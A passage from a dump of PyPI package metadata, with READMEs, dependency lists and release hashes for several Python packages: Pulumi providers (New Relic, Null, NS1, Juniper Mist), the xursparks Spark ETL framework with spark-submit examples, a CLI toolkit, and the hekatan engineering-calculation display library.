- `newrelic:insecureSkipVerify` - Trust self-signed SSL certificates. If omitted, the `NEW_RELIC_API_SKIP_VERIFY` environment
variable is used.
- `newrelic:insightsInsertKey` - Your Insights insert key used when inserting Insights events via the `insights.Event` resource.
Can also use `NEW_RELIC_INSIGHTS_INSERT_KEY` environment variable.
- `newrelic:insightsInsertUrl` - This argument changes the Insights insert URL (default is `https://insights-collector.newrelic.com/v1/accounts`).
If the New Relic account is in the EU, the Insights API URL must be set to `https://insights-collector.eu.newrelic.com/v1`.
- `newrelic:caCerts` - A path to a PEM-encoded certificate authority used to verify the remote agent's certificate. The
`NEW_RELIC_API_CACERT` environment variable can also be used.
## Reference
For further information, please visit [the NewRelic provider docs](https://www.pulumi.com/docs/intro/cloud-providers/newrelic) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/newrelic).
[1]: https://www.pulumi.com/docs
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, new relic | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-newrelic"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:29:38.948493 | pulumi_newrelic-5.62.0a1771568491.tar.gz | 361,682 | 12/6b/7e0fe75b1910d01614e620a85992b84c85ae0ecf11eda81eaac0df13832a/pulumi_newrelic-5.62.0a1771568491.tar.gz | source | sdist | null | false | 032520f62eec19527cf80a0db92bc4b3 | 3fd39cdfb6ed6f2563ed027f8df131f267d318e1fe1267590e5293c6abcd518b | 126b7e0fe75b1910d01614e620a85992b84c85ae0ecf11eda81eaac0df13832a | null | [] | 278 |
2.4 | xursparks | 1.2.12.post3 | Encapsulating Apache Spark for Easy Usage | # Xursparks - XAIL's Apache Spark Framework
## Overview
Welcome to the Xurpas AI Lab (XAIL) department's Apache Spark Framework. This framework is specifically designed to help XAIL developers implement Extract, Transform, Load (ETL) processes seamlessly and uniformly. Additionally, it includes integration capabilities with the Data Management and Configuration Tool (DMCT) to streamline your data workflows.
## Table of Contents
1. [Introduction](#introduction)
2. [Prerequisites](#prerequisites)
3. [Installation](#installation)
4. [Usage](#usage)
- [Setting Up Your Spark Application](#setting-up-your-spark-application)
- [ETL Process Implementation](#etl-process-implementation)
- [Integration with DMCT](#integration-with-dmct)
5. [Best Practices](#best-practices)
6. [Contributing](#contributing)
7. [Support](#support)
8. [License](#license)
## Introduction
This framework aims to provide a robust and standardized approach for XAIL developers to handle ETL processes using Apache Spark. By leveraging this framework, you can ensure that your data pipelines are efficient, maintainable, and easily integrable with the DMCT tool.
## Prerequisites
Before you begin, ensure you have met the following requirements:
- Apache Spark 3.0 or higher
- Python 3.10 or higher
- Access to the DMCT tool and relevant API keys
## Installation
To use framework, follow these steps:
1. install xursparks in python env:
```
pip install xursparks
```
2. check if properly installed"
```
pip list
```
## Usage
Setting Up Your Spark Application
To start using the framework, create ETL Job as follows:
```
import xursparks
xursparks.initialize(args)
```
## ETL Process Implementation
The framework provides predefined templates and utility functions to facilitate your ETL processes.
```
sourceTables = xursparks.getSourceTables()
sourceDataStorage = sourceTables.get("scheduled_manhours_ELE")
processDate = xursparks.getProcessDate()
sourceDataset = xursparks.loadSourceTable(dataStorage=sourceDataStorage,
processDate=processDate)
```
## Integration with DMCT
To integrate with the DMCT tool, ensure you have the required configurations set up in your application.properties file:
```
[default]
usage.logs=<usage logs>
global.config=<dmct global config api>
job.context=<dmct job context api>
api.token="dmct api token"
```
## Best Practices
Always validate your data at each stage of the ETL process.
- Leverage Spark's in-built functions and avoid excessive use of UDFs (User Defined Functions) for better performance.
- Ensure proper error handling and logging to facilitate debugging.
- Keep your ETL jobs modular and maintainable by adhering to the single responsibility principle.
## Contributing
We welcome contributions to improve this framework. Please refer to the CONTRIBUTING.md file for guidelines on how to get started.
## Support
If you encounter any issues or have questions, please reach out to the XAIL support team at support@xail.com.
## License
This project is licensed under the Apache License 2.0. See the LICENSE file for details.
--------------------------------------------------------------------------------
## Running Xursparks Job
* SPARK-SUBMIT
```
spark-submit XurSparkSMain.py \
--master=local[*] \
--client-id=trami-data-folder \
--target-table=talentsolutions.candidate_reports \
--process-date=2023-05-24 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop Sir Andy Setp
```
python AiLabsCandidatesDatamart.py \
--master=local[*] \
--deploy-mode=cluster \
--client-id=trami-data-folder \
--target-table=ailabs.candidates_transformed \
--process-date=2023-11-15 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop
```
spark-submit \
--name AiLabsCandidatesDatamart \
--master yarn \
--jars aws-java-sdk-bundle-1.12.262.jar,hadoop-aws-3.3.4.jar \
--conf spark.yarn.dist.files=job-application.properties \
AiLabsCandidatesDatamart.py \
--keytab=hive.keytab \
--principal=hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--master=yarn \
--deploy-mode=cluster \
--client-id=trami-data-folder \
--target-table=ailabs.candidates_transformed \
--process-date=2023-11-16 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop 3.3.2
```
spark-submit \
--name AiLabsCandidatesDatamart \
--master yarn \
--keytab hive.keytab \
--principal hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--jars aws-java-sdk-bundle-1.12.262.jar,hadoop-aws-3.3.4.jar,hive-jdbc-3.1.3.jar \
--conf spark.yarn.dist.files=job-application.properties \
AiLabsCandidatesDatamart.py \
--keytab=hive.keytab \
--principal=hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--master=yarn \
--deploy-mode=client \
--client-id=trami-data-folder \
--target-table=ailabs.candidates_transformed \
--process-date=2023-11-17 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop testhdfs 3.3.2
```
spark-submit \
--name HdfsTest \
--master yarn \
--deploy-mode client \
--keytab hive.keytab \
--principal hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--jars aws-java-sdk-bundle-1.12.262.jar,hadoop-aws-3.3.4.jar \
--conf spark.yarn.dist.files=job-application.properties \
--driver-memory 4g \
--executor-memory 4g \
--executor-cores 2 \
HdfsTest.py \
--keytab=hive.keytab \
--principal=hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--master=yarn \
--deploy-mode=cluster \
--client-id=trami-data-folder \
--target-table=ailabs.candidates_transformed \
--process-date=2023-11-16 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop
```
spark-submit \
--name AiLabsCandidatesDatamart \
--master yarn \
--jars aws-java-sdk-bundle-1.12.262.jar,hadoop-aws-3.3.4.jar,hive-jdbc-3.1.3.jar \
--conf spark.yarn.dist.files=job-application.properties \
AiLabsCandidatesDatamart.py \
--master=yarn \
--deploy-mode=client \
--client-id=trami-data-folder \
--target-table=ailabs.candidates_transformed \
--process-date=2023-11-19 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop Employees
```
spark-submit \
--name AiLabsEmployeeDatamart \
--master yarn \
--keytab hive.keytab \
--principal hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--jars aws-java-sdk-bundle-1.12.262.jar,hadoop-aws-3.3.4.jar,hive-jdbc-3.1.3.jar,spark-excel_2.12-3.5.0_0.20.1.jar \
--conf spark.yarn.dist.files=job-application.properties \
AiLabsEmployeeDatamart.py \
--keytab=hive.keytab \
--principal=hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--master=yarn \
--deploy-mode=client \
--client-id=trami-data-folder \
--target-table=ailab.employees \
--process-date=2023-11-30 \
--properties-file=job-application.properties \
--switch=1
```
* Hadoop Candidates
```
spark-submit \
--name AiLabsHdfsDatamart \
--master yarn \
--keytab hive.keytab \
--principal hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--jars aws-java-sdk-bundle-1.12.262.jar,hadoop-aws-3.3.4.jar,hive-jdbc-3.1.3.jar,spark-excel_2.12-3.5.0_0.20.1.jar \
--conf spark.yarn.dist.files=job-application.properties \
AiLabsHdfsDatamart.py \
--keytab=hive.keytab \
--principal=hive/hdfscluster.local@HDFSCLUSTER.LOCAL \
--master=yarn \
--deploy-mode=client \
--client-id=trami-data-folder \
--target-table=ailab.candidates_transformed_hdfs \
--process-date=2023-11-19 \
--properties-file=job-application.properties \
--switch=1
```
| text/markdown | Randell Gabriel Santos | randellsantos@gmail.com | null | null | MIT | null | [
"Development Status :: 5 - Production/Stable",
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | https://github.com/dev-doods687/xursparks | null | >=3.10 | [] | [] | [] | [
"setuptools",
"wheel",
"twine",
"requests",
"numpy==1.26.4",
"pandas",
"pyspark==3.5.2",
"boto3",
"openpyxl",
"xurpas_data_quality",
"openai==1.54.5",
"langchain==0.2.17",
"langchain_community==0.2.19",
"langchain_core==0.2.43",
"langchain_openai==0.1.20",
"llama_index==0.10.39",
"llama_index.core==0.10.68.post1",
"langchain_experimental==0.0.65",
"tabulate==0.9.0",
"PyMuPDF==1.24.14",
"llama-index-llms-langchain==0.3.0",
"PyHive==0.7.0",
"thrift>=0.12.0",
"cryptography==45.0.4",
"autopep8>=2.3.2",
"requests_ntlm>=1.3.0",
"google-auth-oauthlib==1.2.2",
"google-auth-httplib2==0.2.0",
"google-api-python-client==2.184.0"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.10.0rc2 | 2026-02-20T06:29:19.297562 | xursparks-1.2.12.post3.tar.gz | 46,095 | 8e/cd/1c0cc05e1853b168cf7ea50bc05ee70b3f120f5915cfbfa59aff7309545a/xursparks-1.2.12.post3.tar.gz | source | sdist | null | false | 896ecd2e3c4ee2eaf3794d1a359e1fc3 | 95ca3fa3953d08ccfc900988d37065ec8ec5fc1b916f3b0e27d5c3158816eb9e | 8ecd1c0cc05e1853b168cf7ea50bc05ee70b3f120f5915cfbfa59aff7309545a | null | [] | 203 |
2.4 | pulumi-null | 0.1.0a1771568569 | A Pulumi package for creating and managing Null cloud resources. | [](https://github.com/pulumi/pulumi-null/actions)
[](https://www.npmjs.com/package/@pulumi/null)
[](https://pypi.org/project/pulumi_null)
[](https://www.nuget.org/packages/Pulumi.Null)
[](https://pkg.go.dev/github.com/pulumi/pulumi-null/sdk/go)
[](https://github.com/pulumi/pulumi-null/blob/master/LICENSE)
# Null Resource Provider
This provider is mainly used for ease of converting terraform programs to Pulumi.
For standard use in Pulumi programs, please use your programming language's implementation of null values.
The Null resource provider for Pulumi lets you use Null resources in your cloud programs.
To use this package, please [install the Pulumi CLI first](https://www.pulumi.com/docs/install/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/null
or `yarn`:
$ yarn add @pulumi/null
### Python
To use from Python, install using `pip`:
$ pip install pulumi_null
### Go
To use from Go, use `go get` to grab the latest version of the library:
$ go get github.com/pulumi/pulumi-null/sdk
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Null
<!-- If your provider has configuration, remove this comment and the comment tags below, updating the documentation. -->
<!--
## Configuration
The following Pulumi configuration can be used:
- `null:token` - (Required) The API token to use with Null. When not set, the provider will use the `NULL_TOKEN` environment variable.
-->
<!-- If your provider has reference material available elsewhere, remove this comment and the comment tags below, updating the documentation. -->
<!--
## Reference
For further information, please visit [Null reference documentation](https://example.com/null).
-->
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, category/cloud | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://www.pulumi.com/",
"Repository, https://github.com/pulumi/pulumi-null"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:29:06.538954 | pulumi_null-0.1.0a1771568569.tar.gz | 10,677 | 6c/c8/e0749427ad3e9f9897f927a3cb4fecb74bc0020cd25ae8416d5b4e0d677a/pulumi_null-0.1.0a1771568569.tar.gz | source | sdist | null | false | 982fe78569afdba9ee99785bdf286190 | 1f361ce691f198bd56a7edea4764a2820841a5422435ca462ab3598fec192a10 | 6cc8e0749427ad3e9f9897f927a3cb4fecb74bc0020cd25ae8416d5b4e0d677a | null | [] | 189 |
2.4 | TUtils-cli | 0.1.1a1 | TUtils command-line utility toolkit | # TUtils
Most of my work involves using the command line, and sometimes it's simply faster than launching new software. I love Python because countless talented developers have created powerful packages that let me accomplish all sorts of tasks through it. I want to build a command-line tool that lets me achieve what I need without worrying about the underlying code. And I'm still developing it.
See [doc](./docs/index.md) for more details.
## How to Use
You can install TUtils using pip:
```
pip install tutils-cli
```
After installation, you can use the `tutils` command followed by the desired subcommand to perform various tasks. For example:
```
tutils subcommand [options]
```
For detailed usage instructions and available subcommands, please refer to the documentation or run:
```
tutils --help
```
## LICENSE
MIT,Thanks! | text/markdown | null | Jared3Dev <ruxia.tjy@qq.com> | null | null | null | TUtils, TUtils-cli, cli, command-line | [
"Development Status :: 2 - Pre-Alpha",
"Environment :: Console",
"License :: OSI Approved :: MIT License",
"Natural Language :: Chinese (Simplified)",
"Natural Language :: English",
"Operating System :: Microsoft :: Windows :: Windows 10",
"Operating System :: Microsoft :: Windows :: Windows 11",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: 3.15"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"markdown>=3.4",
"pydantic>=1.10.0",
"pyyaml>=6.0",
"rich",
"typer>=0.23.1"
] | [] | [] | [] | [
"Homepage, https://github.com/ruxia-TJY/TUtils",
"Documentation, https://github.com/ruxia-TJY/TUtils",
"Repository, https://github.com/ruxia-TJY/TUtils.git",
"Issues, https://github.com/ruxia-TJY/TUtils/issues",
"Changelog, https://github.com/ruxia-TJY/TUtils/blob/main/CHANGELOG.md"
] | twine/6.2.0 CPython/3.12.7 | 2026-02-20T06:28:51.029959 | tutils_cli-0.1.1a1.tar.gz | 57,637 | f5/34/f2e677cebcbe3e002f20564699d228372e43b328a323ba2e6c7baf69aefa/tutils_cli-0.1.1a1.tar.gz | source | sdist | null | false | 6a9472238823edfdfa43010c3842d5df | 60adf4d5d4815ae073282cd6e37913f672c0f141a8d4ffa8a881f34296d1680a | f534f2e677cebcbe3e002f20564699d228372e43b328a323ba2e6c7baf69aefa | null | [
"LICENSE"
] | 0 |
2.4 | pulumi-juniper-mist | 0.8.0a1771568035 | A Pulumi package for creating and managing Juniper Mist resources. | # Juniper Mist Resource Provider
The Juniper Mist Resource Provider lets you manage Juniper Mist resources.
## Installation
This package is available for several languages/platforms:
- JavaScript/TypeScript: [`@pulumi/juniper-mist`](https://www.npmjs.com/package/@pulumi/juniper-mist)
- Python: [`pulumi-juniper-mist`](https://pypi.org/project/pulumi-juniper-mist/)
- Go: [`github.com/pulumi/pulumi-juniper-mist/sdk/go/junipermist`](https://pkg.go.dev/github.com/pulumi/pulumi-junipermist/sdk/go/junipermist)
- .NET: [`Pulumi.JuniperMist`](https://www.nuget.org/packages/Pulumi.JuniperMist)
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/juniper-mist
```
or `yarn`:
```bash
yarn add @pulumi/juniper-mist
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi-juniper-mist
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-junipermist/sdk/go/junipermist
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.JuniperMist
```
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, juniper, mist, category/cloud | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.com",
"Repository, https://github.com/pulumi/pulumi-junipermist"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:27:57.725288 | pulumi_juniper_mist-0.8.0a1771568035.tar.gz | 956,155 | 10/9e/f84bbc6b05ef21bfbab173542056896570d560d26e934569850f602c38e8/pulumi_juniper_mist-0.8.0a1771568035.tar.gz | source | sdist | null | false | 61f2486ef312e5eba1edcbc2a5c6543b | b84fbdb96cc1dca1fb6b8db82d29b2f3faa33170ea9ec66ab2d46f33c7992173 | 109ef84bbc6b05ef21bfbab173542056896570d560d26e934569850f602c38e8 | null | [] | 187 |
2.4 | hekatan | 0.9.0 | Python display library for engineering calculations - matrices, equations, symbolic math with SymPy | # hekatan
> Python display library for engineering calculations — equations, matrices, figures, academic papers.
[](https://pypi.org/project/hekatan/)
[](https://pypi.org/project/hekatan/)
[](LICENSE)
[](https://pypi.org/project/hekatan/)
**hekatan** turns your Python engineering scripts into publication-quality HTML documents — with proper math notation, matrices with brackets, fraction bars, integrals, summations, design checks, and academic paper layouts. Zero dependencies. No LaTeX required.
---
## Installation
```bash
pip install hekatan
```
Requires Python 3.8+. No external dependencies.
## Quick Start
```python
from hekatan import matrix, eq, var, fraction, title, text, check, show
title("Beam Design")
text("Rectangular section properties:")
var("b", 300, "mm", "beam width")
var("h", 500, "mm", "beam height")
eq("A", 300 * 500, "mm^2")
title("Stiffness Matrix", level=2)
K = [[12, 6, -12, 6],
[6, 4, -6, 2],
[-12, -6, 12, -6],
[6, 2, -6, 4]]
matrix(K, "K")
title("Design Check", level=2)
fraction("M_u", "phi * b * d^2", "R_n")
check("sigma", 150, 250, "MPa") # 150 <= 250 -> OK
show() # Opens formatted HTML in your browser
```
## Rich Equations
The `eq_block()` function renders equations with fractions, integrals, summations, and equation numbers — using Hekatan Calc notation:
```python
from hekatan import eq_block, show
# Fractions: (numerator)/(denominator) with recursive nesting
eq_block("k = (E * A)/(L) (1)")
# Integrals with limits
eq_block("∫_{a}^{b} f(x)*dx = F(b) - F(a) (5.5)")
# Summation
eq_block("A = Σ_{i=1}^{N} f_i * Delta*x (5.2)")
# Nested fractions + integrals
eq_block("I = ∫_{0}^{1} (1)/(e^{3x})*dx ≈ 0.3167 (5.13)")
# Partial derivatives as fractions
eq_block("(∂^2M_x)/(∂x^2) + (∂^2M_y)/(∂y^2) + q = 0 (1.1)")
# Multiple equations at once
eq_block(
"sigma = (N)/(A) + (M * y)/(I_z) (2)",
"epsilon = (partial u)/(partial x) (3)",
)
show()
```
### Equation Number Syntax
Equation numbers are placed at the end with **2+ spaces** before the parenthesized number:
```python
eq_block("F = m*a (1)") # Simple: (1)
eq_block("D = (E*h^3)/(12) (1.3)") # Dotted: (1.3)
eq_block("N_x = ∫ sigma_x*dz (1.5a)") # With suffix: (1.5a)
```
### Subscript & Superscript Rules
| Notation | Renders as | Notes |
|----------|-----------|-------|
| `x^2` | x² | Simple superscript (digits only) |
| `x^{2n}` | x²ⁿ | Braced superscript (any content) |
| `N_x` | N with subscript x | Simple subscript (one letter) |
| `N_{xy}` | N with subscript xy | Braced subscript (any content) |
| `∂^2M_x` | ∂²Mₓ | `^` takes digits, `_` takes letter |
## Academic Paper Layout
Create publication-quality documents with paper configuration, headers, footers, author blocks, abstracts, and multi-column layouts:
```python
from hekatan import (
paper, header, footer, author, abstract_block,
title, heading, text, markdown, eq_block, figure,
columns, column, end_columns, table, show, clear,
)
clear()
# Paper config: page size, fonts, accent color
paper(
size="A4",
margin="20mm 18mm 25mm 18mm",
fontsize="10pt",
accent="#F27835",
)
# Header bar
header(left="Journal of Civil Engineering", right="Vol 70, 2018")
# Title and authors
title("Method of Incompatible Modes")
author("Ivo Kozar", "University of Rijeka, Croatia")
# Abstract with keywords
abstract_block(
"This paper presents the method of incompatible modes...",
keywords=["finite elements", "incompatible modes"],
lang="english",
)
# Two-column layout (CSS multi-column flow)
columns(2, css_columns=True)
heading("1. Introduction", 2)
markdown("""
The **finite element method** is based on:
- Weak formulation
- Shape functions
- Assembly procedure
""")
# Rich equations
eq_block("u(x) = N(x) * d + M(x) * alpha (1)")
# SVG figures with captions
figure('<svg width="400" height="200">...</svg>',
caption="Beam element with shape functions",
number="1", width="90%")
end_columns()
show("paper_output.html")
```
## How It Works
Each function works in **3 modes** (auto-detected):
| Mode | When | Behavior |
|------|------|----------|
| **Hekatan** | Inside Hekatan Calc (WPF/CLI) | Emits `@@DSL` commands to stdout |
| **Standalone** | Regular Python script | `show()` generates HTML, opens in browser |
| **Console** | Fallback | ASCII formatted output |
Mode is auto-detected via `HEKATAN_RENDER=1` environment variable. You can force a mode with `set_mode("standalone")`, `set_mode("hekatan")`, or `set_mode("console")`.
## API Reference
### Core Math
| Function | Description | Example |
|----------|-------------|---------|
| `eq(name, value, unit)` | Equation: name = value | `eq("F", 25.5, "kN")` |
| `var(name, value, unit, desc)` | Variable with description | `var("b", 300, "mm", "width")` |
| `eq_block(*equations)` | Rich equations with fractions/integrals | `eq_block("k = (E*A)/(L) (1)")` |
| `formula(expr, name, unit)` | Math formula display | `formula("A_s * f_y / (0.85 * f_c)")` |
| `fraction(num, den, name)` | Formatted fraction | `fraction("M", "S", "sigma")` |
| `matrix(data, name)` | Matrix with brackets | `matrix([[1,2],[3,4]], "A")` |
| `table(data, header)` | Data table | `table([["x","y"],["1","2"]])` |
### Calculus Operators
| Function | Description | Example |
|----------|-------------|---------|
| `integral(expr, var, lo, hi)` | Integral display | `integral("f(x)", "x", "0", "L")` |
| `double_integral(...)` | Double integral | `double_integral("f", "x", "0", "a", "y", "0", "b")` |
| `derivative(func, var, order)` | Derivative df/dx | `derivative("y", "x")` |
| `partial(func, var, order)` | Partial derivative | `partial("u", "x")` |
| `summation(expr, var, lo, hi)` | Summation operator | `summation("a_i", "i", "1", "n")` |
| `product_op(expr, var, lo, hi)` | Product operator | `product_op("a_i", "i", "1", "n")` |
| `sqrt(expr, name, index)` | Square/nth root | `sqrt("a^2 + b^2", "c")` |
| `limit_op(expr, var, to)` | Limit expression | `limit_op("sin(x)/x", "x", "0")` |
### Paper Layout
| Function | Description | Example |
|----------|-------------|---------|
| `paper(size, margin, ...)` | Page configuration | `paper(size="A4", accent="#F27835")` |
| `header(left, right, ...)` | Page header bar | `header(left="Journal", right="Vol 1")` |
| `footer(left, right)` | Page footer | `footer(left="Page 1")` |
| `author(name, affil, email)` | Author block | `author("Dr. Smith", "MIT")` |
| `abstract_block(text, kw)` | Abstract + keywords | `abstract_block("...", keywords=[...])` |
### Text & Content
| Function | Description | Example |
|----------|-------------|---------|
| `title(text, level)` | Heading (h1-h6) | `title("Results", 2)` |
| `heading(text, level)` | Alias for title() | `heading("Section", 3)` |
| `text(content)` | Paragraph text | `text("The beam is safe.")` |
| `markdown(content)` | Markdown text block | `markdown("**bold** and *italic*")` |
| `figure(content, caption, num)` | Figure with caption | `figure("img.png", "Fig 1", "1")` |
| `image(src, alt, width)` | Simple image | `image("photo.jpg", width="60%")` |
| `check(name, val, limit, unit)` | Design verification | `check("sigma", 150, 250, "MPa")` |
| `note(content, kind)` | Callout/note box | `note("Check cover", "warning")` |
| `code(content, lang)` | Code block | `code("import numpy", "python")` |
### Layout
| Function | Description | Example |
|----------|-------------|---------|
| `columns(n, proportions)` | Start multi-column | `columns(2, "32:68")` |
| `column()` | Next column | `column()` |
| `end_columns()` | End columns | `end_columns()` |
| `hr()` | Horizontal rule | `hr()` |
| `page_break(left, right, ...)` | Page break with running header | `page_break(left="Title", right="15")` |
| `html_raw(content)` | Raw HTML | `html_raw("<div>...</div>")` |
| `eq_num(tag)` | Equation number | `eq_num("1.2")` |
### Control
| Function | Description | Example |
|----------|-------------|---------|
| `show(filename)` | Generate HTML + open browser | `show()` or `show("out.html")` |
| `clear()` | Clear accumulated buffer | `clear()` |
| `set_mode(mode)` | Force rendering mode | `set_mode("console")` |
## Features
- **Zero dependencies** — pure Python, no NumPy/LaTeX/MathJax required
- **Greek letters** — auto-converts `alpha`, `sigma`, `phi`, `Delta`, etc. to symbols
- **Subscripts/superscripts** — `A_s` renders as subscript, `x^2` as superscript
- **Braced notation** — `A_{steel}`, `x^{2n}` for multi-character sub/superscripts
- **Smart superscript** — `^` only consumes digits (`∂^2M` stays correct), use `^{x}` for letters
- **Word-boundary safe** — Greek replacement won't corrupt Spanish/Portuguese words
- **Recursive fractions** — `(a + (b)/(c))/(d)` renders nested fraction bars
- **Integrals** — `∫_{a}^{b}` renders with proper limits above/below
- **Summation** — `Σ_{i=1}^{N}` renders with limits above/below
- **Equation numbers** — `(1.1)`, `(1.5a)`, `(2.3b)` all supported
- **CSS columns** — flex-based (manual breaks) and CSS multi-column (auto-flow) layouts
- **Column proportions** — `columns(2, "32:68")` for asymmetric layouts
- **Page breaks with headers** — running headers on each page
- **Print-ready** — `@page` CSS rules for PDF export via browser print
- **Design checks** — pass/fail verification with color-coded output
## Integration with Hekatan Calc
When used inside a [Hekatan Calc](https://github.com/nickkuijpers/Hekatan-Calc-1.0.0) `.hcalc` document:
```
# My Calculation
@{python}
from hekatan import matrix, eq, eq_block
K = [[12, 6], [6, 4]]
matrix(K, "K")
eq("det_K", 12*4 - 6*6)
eq_block("sigma = (M * y)/(I_z) (1)")
@{end python}
```
The output is automatically formatted with Hekatan Calc's CSS — matrices with brackets, equations with proper serif typography, fraction bars, integral symbols, and more.
## Example: FEA Slab Analysis
The `examples/` directory includes a full finite element analysis of a rectangular slab using the BFS plate bending element (585 lines). It demonstrates variables, equations, matrices, tables, partial derivatives, double integrals, and design checks — all rendered as a single HTML document.
```bash
cd examples
python rectangular_slab_fea.py
```
## License
[MIT](LICENSE)
| text/markdown | null | Giorgio Burbanelli <giorgioburbanelli89@gmail.com> | null | null | null | engineering, calculations, matrix, equations, display, hekatan | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
"Intended Audience :: Education",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Scientific/Engineering",
"Topic :: Scientific/Engineering :: Mathematics"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"sympy>=1.12; extra == \"sympy\"",
"ipython>=7.0; extra == \"jupyter\"",
"jupyter; extra == \"jupyter\"",
"sympy>=1.12; extra == \"all\"",
"ipython>=7.0; extra == \"all\"",
"jupyter; extra == \"all\""
] | [] | [] | [] | [
"Homepage, https://github.com/GiorgioBurbanelli89/pyhekatan",
"Repository, https://github.com/GiorgioBurbanelli89/pyhekatan",
"Issues, https://github.com/GiorgioBurbanelli89/pyhekatan/issues"
] | twine/6.2.0 CPython/3.13.5 | 2026-02-20T06:27:33.637471 | hekatan-0.9.0.tar.gz | 51,863 | 65/c2/628e0fc680e084448b5a2a8ef77336b24157599236ef38b8038eadf65002/hekatan-0.9.0.tar.gz | source | sdist | null | false | a48a9adaf36338fe390fa5a1ed4efc00 | 64f210e3c2724963d68385af25ea9d0a3659d1e7ef9f0acf0d0117ccbd4c8ed8 | 65c2628e0fc680e084448b5a2a8ef77336b24157599236ef38b8038eadf65002 | MIT | [
"LICENSE"
] | 229 |
2.4 | pulumi-ns1 | 3.9.0a1771568506 | A Pulumi package for creating and managing ns1 cloud resources. | [](https://github.com/pulumi/pulumi-ns1/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/ns1)
[](https://pypi.org/project/pulumi-ns1)
[](https://badge.fury.io/nu/pulumi.ns1)
[](https://pkg.go.dev/github.com/pulumi/pulumi-ns1/sdk/v3/go)
[](https://github.com/pulumi/pulumi-ns1/blob/master/LICENSE)
# NS1 Resource Provider
The NS1 resource provider for Pulumi lets you manage NS1
resources in your cloud programs. To use this package, please [install the
Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (Java/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/ns1
or `yarn`:
$ yarn add @pulumi/ns1
### Python
To use from Python, install using `pip`:
$ pip install pulumi_ns1
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-ns1/sdk/v3
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Ns1
## Configuration
The following configuration points are available:
* ns1:apikey - (Required) NS1 API token. It must be provided, but it can also be sourced from the `NS1_APIKEY`
environment variable.
* ns1:endpoint - (Optional) NS1 API endpoint. For managed clients, this normally should not be set. Can also be sources
via the `NS1_ENDPOINT` environment variable.
* ns1:enableDdi - (Optional) This sets the permission schema to a DDI-compatible schema. Users of the managed SaaS
product should not need to set this. Users of DDI should set this to true if managing teams, users, or API
keys through this provider.
* ns1:rateLimitParallelism - (Optional) Integer for parallelism amount (default is `10`). NS1 uses a token-based method
for rate limiting API requests.
## Reference
For further information, please visit [the NS1 provider docs](https://www.pulumi.com/docs/intro/cloud-providers/ns1)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/ns1).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, ns1 | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-ns1"
